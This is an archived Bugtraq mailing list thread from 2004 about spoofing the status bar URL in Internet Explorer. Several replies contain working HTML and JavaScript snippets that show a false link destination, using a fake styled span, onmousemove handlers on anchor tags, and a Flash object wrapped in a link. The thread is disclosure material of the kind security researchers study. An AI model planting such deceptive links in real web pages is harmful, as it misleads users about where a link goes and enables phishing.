Bugtraq mailing list archives
RE: New URL spoofing bug in Microsoft Internet Explorer
From: "Michael Silk" <michaels () phg com au>
Date: Wed, 17 Nov 2004 15:25:05 +1100
Or even a fake "a" tag: <span style="color: blue; text-decoration: underline; cursor: hand;" onmouseover="window.status = 'http://www.msn.com/';" onmouseout="window.status = 'Done.'" onclick="document.location = 'http://www.google.com'"> Visit Msn! </span> -----Original Message----- From: q q [mailto:systemcracker () gmail com] Sent: Wednesday, 17 November 2004 3:11 AM To: bugtraq () securityfocus com Subject: Re: New URL spoofing bug in Microsoft Internet Explorer I thought this was obvious, but having seen the amount of discussion, here's another URL spoofer: <a href="http://www.google.com" onmousemove="window.status='http://www.msn.com';" onmouseout="window.status='Done.';">Visit Msn!</a> note that <a href="http://www.google.com" onmouseover="window.status='http://www.msn.com';" onmouseout="window.status='Done.';">Visit Msn!</a> won't work - it seems MS have already half fixed this.... (tested on MSIE 6.0, winXP) On 8 Nov 2004 23:30:55 -0000, roozbeh afrasiabi <roozbeh_afrasiabi () yahoo com> wrote:
In-Reply-To: <005401c4bd36$6fdf3800$d9ebb9d9@oemcomputer> Here is another way of spoofing the status bar: <a> tag + <object> tag <!--A HREF=http://www.yahoo.com><!--OBJECT
classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflas h.cab#version=6,0,0,0"
WIDTH="300" HEIGHT="50" id="link" ALIGN=""> <PARAM NAME=movie VALUE="link.swf"> <PARAM NAME=quality VALUE=high > <PARAM NAME=bgcolor VALUE=#FFFFFF> <PARAM NAME=menu VALU=FALSE> <EMBED src="link.swf" quality=high bgcolor=#FFFFFF WIDTH="300"
HEIGHT="50" NAME="link" ALIGN=""
TYPE="application/x-shockwave-flash" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED> </a></OBJECT></a> *this method of spoofing the status bar allows malicious users to hide
the target url from suspecting ppl ,demo page uses flash to generate random urls. demo: http://www.persiax.com/pocs/statusbar/status.htm
-- PHP, mySQL Security and more at http://www.puremango.co.uk ********************************************************************** This email message and accompanying data may contain information that is confidential and/or subject to legal privilege. If you are not the intended recipient, you are notified that any use, dissemination, distribution or copying of this message or data is prohibited. If you have received this email message in error, please notify us immediately and erase all copies of this message and attachments. This email is for your convenience only, you should not rely on any information contained herein for contractual or legal purposes. You should only rely on information and/or instructions in writing and on company letterhead signed by authorised persons. **********************************************************************
Current thread:
- Re: New URL spoofing bug in Microsoft Internet Explorer roozbeh afrasiabi (Nov 09)
- Re: New URL spoofing bug in Microsoft Internet Explorer q q (Nov 16)
- Re: New URL spoofing bug in Microsoft Internet Explorer GuidoZ (Nov 17)
- <Possible follow-ups>
- Re: New URL spoofing bug in Microsoft Internet Explorer http-equiv () excite com (Nov 11)
- RE: New URL spoofing bug in Microsoft Internet Explorer Michael Silk (Nov 17)
- Re: New URL spoofing bug in Microsoft Internet Explorer q q (Nov 16)